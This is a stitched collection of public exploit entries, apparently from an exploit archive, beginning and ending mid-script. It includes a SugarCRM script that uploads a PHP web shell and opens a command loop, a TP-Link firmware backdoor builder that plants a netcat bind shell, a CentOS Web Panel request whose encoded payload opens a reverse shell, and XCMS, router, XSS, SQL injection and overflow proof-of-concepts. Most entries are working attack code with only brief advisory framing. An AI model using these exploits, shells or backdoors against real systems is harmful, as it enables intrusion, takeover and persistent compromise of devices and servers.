logging.info("Fake GitHub server is running.")
try:
send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id)
except:
logging.critical("Aborting the script.")
fake_github_server.kill()
sys.exit(1)
if delay is not None:
logging.info(f"Waiting for {delay} seconds to let attack finish.")
time.sleep(delay)
else:
logging.info("Press Enter when the attack is finished.")
input()
logging.debug("Stopping the fake GitHub server.")
fake_github_server.kill()
logging.info("Closing the script.")
if __name__ == "__main__":
main()
# Exploit Title: Splashtop 8.71.12001.0 - Unquoted Service Path
# Date: 12/20/2022
# Exploit Author: A.I. hernandez
# Version: 8.71.12001.0
# Vendor Homepage: https://www.splashtop.com
# Version: current version
# Tested on: Windows 10 21H2
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Splashtop Software Updater Service SSUService C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe
Auto
C:\>sc qc SSUService
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: SSUService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 0 IGNORE
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Splashtop\Splashtop Software Updater\SSUService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Splashtop Software Updater Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# Exploit Title: AD Manager Plus 7122 - Remote Code Execution (RCE)
# Exploit Author: Chan Nyein Wai & Thura Moe Myint
# Vendor Homepage: https://www.manageengine.com/products/ad-manager/
# Software Link: https://www.manageengine.com/products/ad-manager/download.html
# Version: Ad Manager Plus Before 7122
# Tested on: Windows
# CVE : CVE-2021-44228
# Github Repo: https://github.com/channyein1337/research/blob/main/Ad-Manager-Plus-Log4j-poc.md
### Description
In the summer of 2022, I have been doing security engagement on Synack
Red Team in the collaboration with my good friend (Thura Moe Myint).
At that time, Log4j was already widespread on the internet. Manage
Engine had already patched the Ad Manager Plus to prevent it from
being affected by the Log4j vulnerability. They had mentioned that
Log4j was not affected by Ad Manager Plus. However, we determined that
the Ad Manager Plus was running on our target and managed to exploit
the Log4j vulnerability.
### Exploitation
First, Let’s make a login request using proxy.
Inject the following payload in the ```methodToCall``` parameter in
the ```ADSearch.cc``` request.
Then you will get the dns callback with username in your burp collabrator.
### Notes
When we initially reported this vulnerability to Synack, we only
managed to get a DNS callback and our report was marked as LDAP
injection. However, we attempted to gain full RCE on the host but were
not successful. Later, we discovered that Ad Manager Plus was running
on another target, so we tried to get full RCE on that target. We
realized that there was a firewall and an anti-virus running on the
machine, so most of our payloads wouldn't work. After spending a
considerable amount of time , we eventually managed to bypass the
firewall and anti-virus, and achieve full RCE.
### Conclusion
We had already informed Zoho about the log4j vulnerability, and even
after it was fixed, they decided to reward us with a bonus bounty for
our report.
### Mitigation
Updating to a version of Ad Manager Plus higher than 7122 should
resolve the issue.
Exploit Title: perfSONAR v4.4.5 - Partial Blind CSRF
Link: https://github.com/perfsonar/
Affected Versions: v4.x <= v4.4.5
Vulnerability Type: Partial Blind CSRF
Discovered by: Ryan Moore
CVE: CVE-2022-41413
Summary
A partial blind CSRF vulnerability exists in perfSONAR v4.x <= v4.4.5 within the /perfsonar-graphs/ test results page. Parameters and values can be injected/passed via the URL parameter, forcing the client to connect unknowingly in the background to other sites via transparent XMLHTTPRequests. This partial blind CSRF bypasses the built-in whitelisting function in perfSONAR.
This vulnerability was patched in perfSONAR v4.4.6.
Proof of Concept
Examples
Here are two examples of this vulnerability. For further details, review the Technical Overview section below.
Example 1:
Client browser connects to www.google.com in the background.
http://192.168.68.145/perfsonar-graphs/?source=1&dest=2&url=https://www.google.com
Example 2:
Client browser connects to arbitrary IP and port in the background, passing delete parameter to /api endpoint.
http://192.168.68.145/perfsonar-graphs/?source=8.8.8.8&dest=%26action%3Ddelete&url=http://192.168.68.113:4444/api
Exploit Title: XCMS v1.83 - Remote Command Execution (RCE)
Author: Onurcan
Email: onurcanalcan@gmail.com
Site: ihteam.net
Script Download : http://www.xcms.it
Date: 26/12/2022
The xcms's footer(that is in "/dati/generali/footer.dtb") is included in each page of the xcms.
Taking "home.php" for example:
<?php
//home.php
[...]
include(CSTR."footer".STR); // <- "CSTR" and "STR" are the constants previously declared. They refers to "/dati/generali" and "dtb"
?>
So the xcms allow you to modify the footer throught a bugged page called cpie.php included in the admin panel.
So let's take a look to the bugged code.
<?php
//cpie.php
[...]
if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); } // <- so miss an exit() :-D
[...]
if(isset($_POST['salva'])){
Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- save the changements without any kind of control
}
[...]
?>
So with a simple html form we can change the footer.
Ex:
<form name="editor" action="http://[SITE_WITH_XCMS]/index.php?lng=it&pg=admin&s=cpie" method="post">
<input type="hidden" name="salva" value="OK" />
<textarea name="testo_0"><?php YOUR PHP CODE ?></textarea>
<input type="submit" value="Modifica" />
</form>
<script>document.editor.submit()</script>
Note: This is NOT a CSRF, this is just an example to change the footer without the admin credentials.
Trick: We can change the admin panel password by inserting this code in the footer:
<?php
$pwd = "owned"; // <- Place here your new password.
$pwd2 = md5($pwd);
unlink("dati/generali/pass.php");
$f = fopen("dati/generali/pass.php",w);
fwrite($f,"<?php \$mdp = \"$pwd2\"; ?>");
fclose($f);
?>
This code delete the old password file and then create a new one with your new password.
Fix:
<?php
//cpie.php
[...]
if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); exit(); } // with an exit() we can fix the bug.
[...]
if(isset($_POST['salva'])){
Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- save the changements without any kind of control
}
[...]
?>
So this is a simple exploit:
<?php
if(isset($_POST['send']) and isset($_POST['code']) and isset($_POST['site'])){
echo "
<form name=\"editor\" action=\"http://".$_POST['site']."/index.php?lng=it&pg=admin&s=cpie\" method=\"post\">
<input type=\"hidden\" name=\"salva\" value=\"OK\" />
<textarea name=\"testo_0\">".$_POST['code']."</textarea>
<input type=\"submit\" value=\"Modifica\" />
</form>
<script>document.editor.submit()</script>";
}else{
echo"
<pre>
XCMS <= v1.82 Remote Command Execution Vulnerability
Dork : inurl:\"mod=notizie\"
by Onurcan
Visit ihteam.net
</pre>
<form method=POST action=".$_POST['PHP_SELF'].">
<pre>
Site :
<input type=text name=site />
Code :
<textarea name=code cols=49 rows=14>Your code here</textarea>
<input type=submit value=Exploit />
<input type=hidden name=\"send\" />
</pre>
</form>";
}
?>
# Exploit Title: Prizm Content Connect v10.5.1030.8315 - XXE
# Date: 21/12/2022
# Exploit Author: @xhzeem
# Vendor Homepage:
https://help.accusoft.com/PCC/v9.0/HTML/About%20Prizm%20Content%20Connect.html
# Version: v10.5.1030.8315
The Prizm Content Connect v10.5.1030.8315 is vulnerable to XXE
Proof Of Concept:
http://www.example.com/default.aspx?document=file.xml
The file.xml can have an OoB XXE payload or any other blind XXE exploit.
#!/usr/bin/env python
# Exploit Title: SugarCRM 12.2.0 - Remote Code Execution (RCE)
# Exploit Author: sw33t.0day
# Vendor Homepage: https://www.sugarcrm.com
# Version: all commercial versions up to 12.2.0
# Dorks:
# https://www.google.com/search?q=site:sugarondemand.com&filter=0
# https://www.google.com/search?q=intitle:"SugarCRM"+inurl:index.php
# https://www.shodan.io/search?query=http.title:"SugarCRM"
# https://search.censys.io/search?resource=hosts&q=services.http.response.html_title:"SugarCRM"
# https://search.censys.io/search?resource=hosts&q=services.http.response.headers.content_security_policy:"*.sugarcrm.com"
import base64, re, requests, sys, uuid
requests.packages.urllib3.disable_warnings()
if len(sys.argv) != 2:
sys.exit("Usage: %s [URL]" % sys.argv[0])
print "[+] Sending authentication request"
url = sys.argv[1] + "/index.php"
session = {"PHPSESSID": str(uuid.uuid4())}
params = {"module": "Users", "action": "Authenticate", "user_name": 1, "user_password": 1}
requests.post(url, cookies=session, data=params, verify=False)
print "[+] Uploading PHP shell\n"
png_sh = "iVBORw0KGgoAAAANSUhEUgAAABkAAAAUCAMAAABPqWaPAAAAS1BMVEU8P3BocCBlY2hvICIjIyMjIyI7IHBhc3N0aHJ1KGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJjIl0pKTsgZWNobyAiIyMjIyMiOyA/PiD2GHg3AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAKklEQVQokWNgwA0YmZhZWNnYOTi5uHl4+fgFBIWERUTFxCXwaBkFQxQAADC+AS1MHloSAAAAAElFTkSuQmCC"
upload = {"file": ("sweet.phar", base64.b64decode(png_sh), "image/png")} # you can also try with other extensions like .php7 .php5 or .phtml
params = {"module": "EmailTemplates", "action": "AttachFiles"}
requests.post(url, cookies=session, data=params, files=upload, verify=False)
url = sys.argv[1] + "/cache/images/sweet.phar"
while True:
cmd = raw_input("# ")
res = requests.post(url, data={"c": base64.b64encode(cmd)}, verify=False)
res = re.search("#####(.*)#####", res.text, re.DOTALL)
if res:
print res.group(1)
else:
sys.exit("\n[+] Failure!\n")
# Exploit Title: Reprise Software RLM v14.2BL4 - Cross-Site Scripting (XSS)
# Exploit Author: Mohammed A.Siledar
# Author Company : reprisesoftware
# Version: rlm.v14.2BL4
# Vendor home page : https://reprisesoftware.com
# Software Link: https://www.reprisesoftware.com/license_admin_kits/rlm.v14.2BL4-x64_w3.admin.exe
# Authentication Required: No
# CVE : CVE-2022-30519
# Tested on: Windows 10
# Proof Of Concept:
http://localhost/goform/login_process?username=admin&password=admin%22%3E%3Cimg%20src=x%20onerror=confirm(123)%3E
Best Regards.
Exploit Title: Hughes Satellite Router HX200 v8.3.1.14 - Remote File Inclusion
Vendor: Hughes Network Systems, LLC
Product web page: https://www.hughes.com
Affected version: HX200 v8.3.1.14
HX90 v6.11.0.5
HX50L v6.10.0.18
HN9460 v8.2.0.48
HN7000S v6.9.0.37
Summary: The HX200 is a high-performance satellite router designed to
provide carrier-grade IP services using dynamically assigned high-bandwidth
satellite IP connectivity. The HX200 satellite router provides flexible
Quality of Service (QoS) features that can be tailored to the network
applications at each individual remote router, such as Adaptive Constant
Bit Rate (CBR) bandwidth assignment to deliver high-quality, low jitter
bandwidth for real-time traffic such as Voice over IP (VoIP) or videoconferencing.
With integrated IP features including RIPv1, RIPv2, BGP, DHCP, NAT/PAT,
and DNS Server/Relay functionality, together with a high-performance
satellite modem, the HX200 is a full-featured IP Router with an integrated
high-performance satellite router. The HX200 enables high- performance
IP connectivity for a variety of applications including cellular backhaul,
MPLS extension services, virtual leased line, mobile services and other
high-bandwidth solutions.
Desc: The router contains a cross-frame scripting via remote file inclusion
vulnerability that may potentially be exploited by malicious users to compromise
an affected system. This vulnerability may allow an unauthenticated malicious
user to misuse frames, include JS/HTML code and steal sensitive information
from legitimate users of the application.
Tested on: WindWeb/1.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5743
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5743.php
23.12.2022
--
snippet:///XFSRFI
//
// Hughes Satellite Router RFI/XFS PoC Exploit
// by lqwrm 2022
//
//URL http://TARGET/fs/dynaform/speedtest.html
//Reload target
//window.location.reload()
console.log("Loading Broadband Satellite Browsing Test");
//Add cross-frame file include (http only)
AddURLtoList("http://www.zeroscience.mk/pentest/XSS.svg");
console.log("Calling StartTest()");
StartTest()
//console.log("Calling DoTest()");
//DoTest()
//Unload weapon
//document.getElementById("URLList").remove();
# Exploit Title: Apache 2.4.x - Buffer Overflow
# Date: Jan 2 2023
# Exploit Author: Sunil Iyengar
# Vendor Homepage: https://httpd.apache.org/
# Software Link: https://archive.apache.org/dist/httpd/
# Version: Any version less than 2.4.51. Tested on 2.4.50 and 2.4.51
# Tested on: (Server) Kali, (Client) MacOS Monterey
# CVE : CVE-2021-44790
import requests
#Example "http(s)://<hostname>/process.lua"
url = "http(s)://<hostname>/<luafile>"
payload = "4\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n0\r\n4\r\n"
headers = {
'Content-Type': 'multipart/form-data; boundary=4'
}
#Note1: The value for boundary=4, in the above example, is arbitrary. It can be anything else like 1.
# But this has to match with the values in Payload.
#Note2: The form data as shown above returns the response as "memory allocation error: block too big".
# But one can change the payload to name=\"name\"\r\n\r\n\r\n4\r\n" and not get the error but on the lua module overflows
# 3 more bytes during memset
response = requests.request("POST", url, headers=headers, data=payload)
print(response.text)
#Response returned is
#<h3>Error!</h3>
#<pre>memory allocation error: block too big</pre>
# !/usr/bin/python3
# Exploit Title: TP-Link TL-WR902AC firmware 210730 (V3) - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Tobias Müller
# Date: 2022-12-01
# Version: TL-WR902AC(EU)_V3_0.9.1 Build 220329
# Vendor Homepage: https://www.tp-link.com/
# Tested On: TP-Link TL-WR902AC
# Vulnerability Description: Remote Code Execution via importing malicious firmware file
# CVE: CVE-2022-48194
# Technical Details: https://github.com/otsmr/internet-of-vulnerable-things
TARGET_HOST = "192.168.0.1"
ADMIN_PASSWORD = "admin"
TP_LINK_FIRMWARE_DOWNLOAD = "https://static.tp-link.com/upload/firmware/2022/202208/20220803/TL-WR902AC(EU)_V3_220329.zip"
import requests
import os
import glob
import subprocess
import base64, os, hashlib
from Crypto.Cipher import AES, PKCS1_v1_5 # pip install pycryptodome
from Crypto.PublicKey import RSA
from Crypto.Util.Padding import pad
for program in ["binwalk", "fakeroot", "unsquashfs", "mksquashfs"]:
if "not found" in subprocess.check_output(["which", program]).decode():
print(f"[!] need {program} to run")
exit(1)
class WebClient(object):
def __init__(self, host, password):
self.host = "http://" + host
self.password = password
self.password_hash = hashlib.md5(('admin%s' % password.encode('utf-8')).encode('utf-8')).hexdigest()
self.aes_key = "7765636728821987"
self.aes_iv = "8775677306058909"
self.session = requests.Session()
crypto_data = self.cgi_basic("?8", "[/cgi/getParm#0,0,0,0,0,0#0,0,0,0,0,0]0,0\r\n").text
self.sign_rsa_e = int(crypto_data.split("\n")[1].split('"')[1], 16)
self.sign_rsa_n = int(crypto_data.split("\n")[2].split('"')[1], 16)
self.seq = int(crypto_data.split("\n")[3].split('"')[1])
self.jsessionid = self.get_jsessionid()
def get_jsessionid(self):
post_data = f"8\r\n[/cgi/login#0,0,0,0,0,0#0,0,0,0,0,0]0,2\r\nusername=admin\r\npassword={self.password}\r\n"
self.get_encrypted_request_data(post_data, True)
return self.session.cookies["JSESSIONID"]
def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):
cipher = AES.new(aes_key.encode('utf-8'), AES.MODE_CBC, iv=aes_iv.encode('utf-8'))
plaintext_padded = pad(plaintext, aes_block_size)
return cipher.encrypt(plaintext_padded)
def rsa_encrypt(self, n, e, plaintext):
public_key = RSA.construct((n, e)).publickey()
encryptor = PKCS1_v1_5.new(public_key)
block_size = int(public_key.n.bit_length() / 8) - 11
encrypted_text = ''
for i in range(0, len(plaintext), block_size):
encrypted_text += encryptor.encrypt(plaintext[i:i + block_size]).hex()
return encrypted_text
def get_encrypted_request_data(self, post_data, is_login: bool):
encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, post_data.encode('utf-8'))
encrypted_data = base64.b64encode(encrypted_data).decode()
self.seq += len(encrypted_data)
signature = f"h={self.password_hash}&s={self.seq}"
if is_login:
signature = f"key={self.aes_key}&iv={self.aes_iv}&" + signature
encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature.encode('utf-8'))
body = f"sign={encrypted_signature}\r\ndata={encrypted_data}\r\n"
return self.cgi_basic("_gdpr", body)
def cgi_basic(self, url: str, body: str):
res = self.session.post(f"{self.host}/cgi{url}", data=body, headers={
"Referer": "http://192.168.0.1/"
})
if res.status_code != 200:
print(res.text)
raise ValueError("router not reachable")
return res
def cmd(command):
print("[*] running " + command)
os.system(command)
def build_backdoor():
if os.path.isdir("./tp_tmp"):
cmd("rm -r -f ./tp_tmp")
os.mkdir("./tp_tmp")
os.chdir('./tp_tmp')
print("[*] downloading firmware")
res = requests.get(TP_LINK_FIRMWARE_DOWNLOAD)
with open("firmware.zip", "wb") as f:
f.write(res.content)
print("[*] downloading netcat")
#res = requests.get(NETCAT_PRECOMPILED_FILE)
#with open("netcat", "wb") as f:
# f.write(res.content)
if os.path.isfile("netcat"):
print("[!] netcat not found")
exit()
cmd('unzip firmware.zip')
filename = glob.glob("TL-*.bin")[0]
cmd(f"mv '{filename}' firmware.bin")
cmd('binwalk --dd=".*" firmware.bin')
cmd('fakeroot -s f.dat unsquashfs -d squashfs-root _firmware.bin.extracted/160200')
with open("./squashfs-root/etc/init.d/back", "w") as f:
f.write("""
#!/bin/sh
while true;
do
netcat -l -p 3030 -e /bin/sh
sleep 5
done
""")
cmd("chmod +x ./squashfs-root/etc/init.d/back")
with open("./squashfs-root/etc/init.d/rcS", "r+") as f:
content = f.read()
content = content.replace("cos &", "/etc/init.d/back &\ncos &")
f.write(content)
cmd("cp netcat ./squashfs-root/usr/bin/")
cmd("chmod +x ./squashfs-root/usr/bin/netcat")
cmd("fakeroot -i f.dat mksquashfs squashfs-root backdoor.squashfs -comp xz -b 262144")
size = subprocess.check_output(["file", "backdoor.squashfs"]).decode()
offset = int(size.split(" ")[9]) + 1442304
cmd("dd if=firmware.bin of=backdoor.bin bs=1 count=1442304")
cmd("dd if=backdoor.squashfs of=backdoor.bin bs=1 seek=1442304")
cmd(f"dd if=firmware.bin of=backdoor.bin bs=1 seek={offset} skip={offset}")
os.chdir('../')
cmd(f"mv ./tp_tmp/backdoor.bin .")
cmd("rm -r -f ./tp_tmp")
def upload_backdoor():
wc = WebClient(TARGET_HOST, ADMIN_PASSWORD)
print("[*] uploading backdoor")
files = {
'filename': open('backdoor.bin','rb')
}
re_upload = requests.post("http://" + TARGET_HOST + "/cgi/softup", cookies={
"JSESSIONID": wc.jsessionid
}, headers={
"Referer": "http://192.168.0.1/mainFrame.htm"
}, files=files)
if re_upload.status_code != 200 or "OK" not in re_upload.text:
print("[!] error")
exit(1)
print("[*] success!")
print("\nWait for router restart, then run:")
print("nc 192.168.0.1 3030")
build_backdoor()
upload_backdoor()
[+] Exploit Title: Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)
[+] Centos Web Panel 7 - < 0.9.8.1147
[+] Affected Component ip:2031/login/index.php?login=$(whoami)
[+] Discoverer: Numan Türle @ Gais Cyber Security
[+] Author: Numan Türle
[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194
[+] CVE: CVE-2022-44877
Description
--------------
Bash commands can be run because double quotes are used to log incorrect entries to the system.
Video Proof of Concept
--------------
https://www.youtube.com/watch?v=kiLfSvc1SYY
Proof of concept:
--------------
POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1
Host: 10.13.37.10:2031
Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82
Content-Length: 40
Origin: https://10.13.37.10:2031
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://10.13.37.10:2031/login/index.php?login=failed
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close
username=root&password=toor&commit=Login
--------------
Solution
--------
Upgrade to CWP7 current version
# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Executio=
n (RCE) (Authenticated)
# Date: 19/10/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.nexxtsolutions.com/
# Version: 42.103.1.5095
# Tested on: ARN02304U8
# CVE : CVE-2022-44149
import requests
import base64
router_host =3D "http://192.168.1.1"
username =3D "admin"
password =3D "admin"
def main():
send_payload("&telnetd")
print("connect to router using: `telnet "+router_host.split("//")[1]+ "=
` using known credentials")
pass
def gen_header(u, p):
return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")
def get_cookie(header):
url =3D router_host+"/login"
params =3D {"arg":header, "_n":1}
resp=3Drequests.get(url, params=3Dparams)
=20
def send_payload(payload):
url =3D router_host+"/goform/sysTools"
headers =3D {"Authorization": "Basic {}".format(gen_header(username, pa=
ssword))}
params =3D {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK=
"}
requests.post(url, headers=3Dheaders, data=3Dparams)
if __name__ =3D=3D '__main__':
main()
## Title: AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)
## Author: nu11secur1ty
## Date: 01.05.2023
## Vendor: https://aimone-video-converter.software.informer.com/,
http://www.aimonesoft.com/
## Software: https://aimone-video-converter.software.informer.com/download/?ca85d0
## Reference:
## Description:
The AimOne Video Converter V2.04 Build 103 suffers from buffer
overflow and local Denial of Service.
The registration form is not working properly and crashes the video converter.
When the attacker decides to register the product. This can allow him
to easily crack the software and do more bad things it depending on
the case.
## STATUS: HIGH Vulnerability - CRITICAL
[+] Exploit:
```Python
#!/usr/bin/python
# nu11secur1ty
print("WELCOME to the AIMONE Video Converter 2.04 Build 103 - Buffer
Overflow exploit builder...\n")
input("Press any key to build the exploit...\n")
buffer = "\x41" * 7000
try:
f=open("PoC.txt","w")
print("[+] Creating %s bytes exploit payload.." %len(buffer))
f.write(buffer)
f.close()
print("[+] The PoC file was created!")
except:
print("File cannot be created")
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/AimOne/AimOne-Video-Converter-V2.04-Build-103)
## Proof and Exploit:
[href](https://streamable.com/v1hvbf)
## Time spent
`00:35:00`
## Writing an exploit
`00:15:00`
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
# Exploit Title: Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)
# Google Dork: N/A
# Date: 2/1/2023
# Exploit Author: Rian Saaty
# Vendor Homepage: https://yui.github.io/yui2/
# Software Link: https://yui.github.io/yui2/
# Version: 2.8.2
# Tested on: MacOS, WindowsOS, LinuxOS
# CVE : CVE-2022-48197
The YUI2 has a lot of reflected XSS vulnerabilities in pretty much
most files. A sample of the vulnerable files along with the exploit
can be found here:
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
Twitter: @Ryan_412_
# Exploit Title: PMB 7.4.6 - SQL Injection
# Google Dork: inurl:opac_css
# Date: 2023-01-06
# Exploit Author: str0xo DZ (Walid Ben) https://github.com/Str0xo
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 7.4.6
-==== Software Description ====-
PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products.
We are some librarians, users and developers deploring this state of affairs.
PMB is based on web technology. This is what we sometimes call a 'web-app'.
PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language.
The main functions of PMB are :
* Supporting the UNIMARC format
* Authorities management (authors, publishers, series, subjects...)
* Management of loans, holds, borrowers...
* A user-friendly configuration
* The ability to import full bibliographic records
* A user-friendly OPAC integrating a browser
* Loans management with a module designed to serve even the very small establishments
* Serials management
* Simple administration procedures that can be handled easily even by the library staff...
-==== Vulnerability ====-
URL:
https://localhost/opac_css/ajax.php?categ=storage&datetime=undefined&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))SHde)&module=ajax&sub=save&token=undefined
Parameter:
id
-==== Vulnerability Details ====-
URL encoded GET input id was set to if(now()=sysdate(),sleep(6),0)
Tests performed:
if(now()=sysdate(),sleep(15),0) => 15.43
if(now()=sysdate(),sleep(6),0) => 6.445
if(now()=sysdate(),sleep(15),0) => 15.421
if(now()=sysdate(),sleep(3),0) => 3.409
if(now()=sysdate(),sleep(0),0) => 0.415
if(now()=sysdate(),sleep(0),0) => 0.413
if(now()=sysdate(),sleep(6),0) => 6.41
Using SQLMAP :
sqlmap -u "http://localhost/pmb/opac_css/ajax.php?categ=storage&datetime=undefined&id=1&module=ajax&sub=save&token=undefined" -p "id"
# Exploit Title: ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS)
# Date: 12/09/2022
# Exploit Author: Rob, CTRL Group
# Vendor Homepage: marigroup.com
# Version: V3.3.3 and under
# Tested on: Windows IIS all versions
# CVE : CVE-2022-35543
“Stored Cross-Site Scripting” Vulnerability within the Elsi Smart Floor software. This vulnerability does require authentication however, once the payload is stored, any user visiting the portal will trigger the alert.
Login to the appplication
Browse to "Settings" tab and tehn " Wards". Create a new word with the following payload at the ward name:
<script>alert(document.cookie)</script>
Any user browsing the application will trigger the payload.
/*
# Exploit Title: NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit
# Date: Jun 2007
# Exploit Author: mu-b
# Vendor Homepage: https://www.microfocus.com/en-us/cyberres/identity-access-management
# Version: All
# Tested on: Windows / Solaris x86/SPARC
# CVE : 0day
* endpoint-pown-uni.c
*
* Copyright (c) 2007 by <mu-b@digit-labs.org>
*
* NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit
* by mu-b - Jun 2007
*
* $Id: endpoint-pown-uni.c 56 2021-04-23 10:15:49Z mu-b $
*
* - Tested on: NetIQ Performance Endpoint 5.1.15750 (win32)
* (Revised: December, 2012)
* NetIQ Performance Endpoint 5.1.15541 (win32)
* (Revised: December, 2012)
* NetIQ Performance Endpoint 5.1.15368 (win32)
* (Revised: December, 2012)
* NetIQ Performance Endpoint 5.1 (win32)
* NetIQ Performance Endpoint 4.2 (freebsd-x86)
* NetIQ Performance Endpoint 5.1 (solaris-SPARC+noexec-stack)
* (Revised: May 23, 2006)
*
*
* "No executable code (like Java or Visual Basic) is sent. There is no way
* to do something like 'run this command.' 100,000’s of endpoints have been
* installed worldwide without incident."
*
* "Endpoints do rigorous internal validation. For example, endpoints are not
* susceptible to 'buffer overrun' attacks used by hackers."
* - https://tinyurl.com/lgmblyj
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <assert.h>
#include <ifaddrs.h>
#include <limits.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#define IPV4_BUFLEN 16 /* "255.255.255.255\0" */
#define PORT_SHELL 10000
#define ENDPT_TCP_PORT 10115
#define ENDPT_PKTMAX 0x1388
static char ppkt_buf1[] =
"\x06" /* ENDPT_COMMAND_SETUP_E1 */
"\x07\x14\x43\x1A" /* verify_get_id (1) */
"\x00\x22" /* copyright_smart_compare */
"Copyright Ganymede Software Inc."
"\x00\x03" /* */
"\xff" /* code_convert_from_line */
"\x00\x03" /* */
"\xff" /* code_convert_from_line */
"\x00" /* */
"\x00\x02" /* len < 0x80 */
"\x00\x03" /* len < 0x40 */
"\x00" /* len < 0x40 */
"\x41\x41\x41\x41\x41\x41\x41\x41" /* */
"\x41\x41\x41\x41\x41\x41\x41\x41" /* */
"\x02" /* protocol */
